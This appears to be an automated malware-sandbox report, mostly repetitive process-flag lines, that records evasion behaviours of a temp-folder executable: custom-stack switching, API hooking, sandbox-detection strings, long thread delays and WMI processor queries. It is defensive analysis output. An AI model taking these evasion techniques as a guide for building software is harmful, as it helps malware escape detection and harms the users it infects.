Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\Temp\bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe	API/Special instruction interceptor: Address: 7FFE2220D044
Source: C:\Windows\SysWOW64\fontdrvhost.exe	API/Special instruction interceptor: Address: 7FFE2220D044
Source: C:\Windows\SysWOW64\fontdrvhost.exe	API/Special instruction interceptor: Address: 563B83A

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000016.00000002.2387314243.0000000002B45000.00000040.00000001.01000000.00000013.sdmp, bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000016.00000002.2387922960.00000000048E9000.00000040.00001000.00020000.00000000.sdmp, bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000003.2403797559.0000000002C79000.00000040.00000400.00020000.00000000.sdmp, bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000003.2395260340.0000000002C79000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: ORIGINALFILENAMECFF EXPLORER.EXE:
Source: bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000016.00000002.2387314243.0000000002B45000.00000040.00000001.01000000.00000013.sdmp, bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000016.00000002.2387922960.00000000048E9000.00000040.00001000.00020000.00000000.sdmp, bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000003.2403797559.0000000002C79000.00000040.00000400.00020000.00000000.sdmp, bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000003.2395260340.0000000002C79000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: INTERNALNAMECFF EXPLORER.EXE

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 2_2_00007FFD9BA0100D sldt word ptr [eax]

2_2_00007FFD9BA0100D

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\conhost.exe	Window / User API: threadDelayed 1638	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5169	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4676	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7600	Thread sleep count: 5169 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7600	Thread sleep count: 4676 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7664	Thread sleep time: -11068046444225724s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7688	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 8016	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\SysWOW64\fontdrvhost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\fontdrvhost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000016.00000000.2224116880.0000000001683000.00000002.00000001.01000000.00000013.sdmp, bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000002.2410433167.0000000001683000.00000002.00000001.01000000.00000013.sdmp	Binary or memory string: ..\hkinternal/collide/mopp/machine/hkMoppUsingFloatAabbVirtualMachine.inl
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000016.00000000.2224116880.0000000001683000.00000002.00000001.01000000.00000013.sdmp, bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000002.2410433167.0000000001683000.00000002.00000001.01000000.00000013.sdmp	Binary or memory string: G.\collide\mopp\machine\hkMoppAabbCastVirtualMachine.cpp..\hkinternal/collide/mopp/machine/hkMoppUsingFloatAabbVirtualMachine.inl
Source: bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000016.00000000.2224116880.0000000001683000.00000002.00000001.01000000.00000013.sdmp, bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000002.2410433167.0000000001683000.00000002.00000001.01000000.00000013.sdmp	Binary or memory string: .\collide\mopp\machine\hkMoppObbVirtualMachine.cpp
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000016.00000000.2224116880.0000000001683000.00000002.00000001.01000000.00000013.sdmp, bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000002.2410433167.0000000001683000.00000002.00000001.01000000.00000013.sdmp	Binary or memory string: .\collide\mopp\machine\hkMoppObbVirtualMachine.cpp.\collide\mopp\machine\hkMoppLongRayVirtualMachine.cpp
Source: bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000016.00000000.2224116880.0000000001683000.00000002.00000001.01000000.00000013.sdmp, bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000002.2410433167.0000000001683000.00000002.00000001.01000000.00000013.sdmp	Binary or memory string: .\collide\mopp\machine\hkMoppLongRayVirtualMachine.cpp
Source: bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000016.00000000.2224116880.0000000001683000.00000002.00000001.01000000.00000013.sdmp, bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000002.2410433167.0000000001683000.00000002.00000001.01000000.00000013.sdmp	Binary or memory string: .\collide\mopp\machine\hkMoppKDopGeometriesVirtualMachine.cpp
Source: bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000016.00000000.2224116880.0000000001683000.00000002.00000001.01000000.00000013.sdmp, bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000002.2410433167.0000000001683000.00000002.00000001.01000000.00000013.sdmp	Binary or memory string: +2.\collide\mopp\machine\hkMoppEarlyExitObbVirtualMachine.cpp
Source: fontdrvhost.exe, 00000018.00000003.2409670656.0000000005630000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: DisableGuestVmNetworkConnectivity
Source: bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000016.00000000.2224116880.0000000001683000.00000002.00000001.01000000.00000013.sdmp, bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000002.2410433167.0000000001683000.00000002.00000001.01000000.00000013.sdmp	Binary or memory string: .\collide\mopp\machine\hkMoppSphereVirtualMachine.cpp
Source: svchost.exe, 00000004.00000002.2930033691.00000252AA041000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2928294324.00000252A4A2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2930089383.00000252AA053000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000016.00000000.2224116880.0000000001683000.00000002.00000001.01000000.00000013.sdmp, bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000002.2410433167.0000000001683000.00000002.00000001.01000000.00000013.sdmp	Binary or memory string: .\collide\mopp\machine\hkMoppModifyVirtualMachine.cpp
Source: bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000016.00000000.2224116880.0000000001683000.00000002.00000001.01000000.00000013.sdmp, bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000002.2410433167.0000000001683000.00000002.00000001.01000000.00000013.sdmp	Binary or memory string: .\collide\mopp\machine\hkMoppFindAllVirtualMachine.cpp
Source: fontdrvhost.exe, 00000018.00000003.2409670656.0000000005630000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: EnableGuestVmNetworkConnectivity
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000016.00000000.2224116880.0000000001683000.00000002.00000001.01000000.00000013.sdmp, bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000002.2410433167.0000000001683000.00000002.00000001.01000000.00000013.sdmp	Binary or memory string: .\collide\mopp\machine\hkMoppSphereVirtualMachine.cppUnknown command - This mopp data has been corrupted (check for memory trashing), or an hkMoppBvTreeShape has been pointed at invalid mopp data.
Source: bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000016.00000000.2224116880.0000000001683000.00000002.00000001.01000000.00000013.sdmp, bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000002.2410433167.0000000001683000.00000002.00000001.01000000.00000013.sdmp	Binary or memory string: +2.\collide\mopp\machine\hkMoppEarlyExitObbVirtualMachine.cpp.\collide\mopp\machine\hkMoppKDopGeometriesVirtualMachine.cpp.\collide\mopp\machine\hkMoppFindAllVirtualMachine.cpp.\collide\mopp\machine\hkMoppModifyVirtualMachine.cpp
Source: powershell.exe, 00000002.00000002.2341629826.0000013D25540000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000003.00000002.1806677298.000002CC60044000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000016.00000000.2224116880.0000000001683000.00000002.00000001.01000000.00000013.sdmp, bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000002.2410433167.0000000001683000.00000002.00000001.01000000.00000013.sdmp	Binary or memory string: G.\collide\mopp\machine\hkMoppAabbCastVirtualMachine.cpp

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe

Code function: 23_3_02C692CC VirtualAlloc,VirtualAlloc,VirtualProtect,LdrInitializeThunk,VirtualFree,

23_3_02C692CC

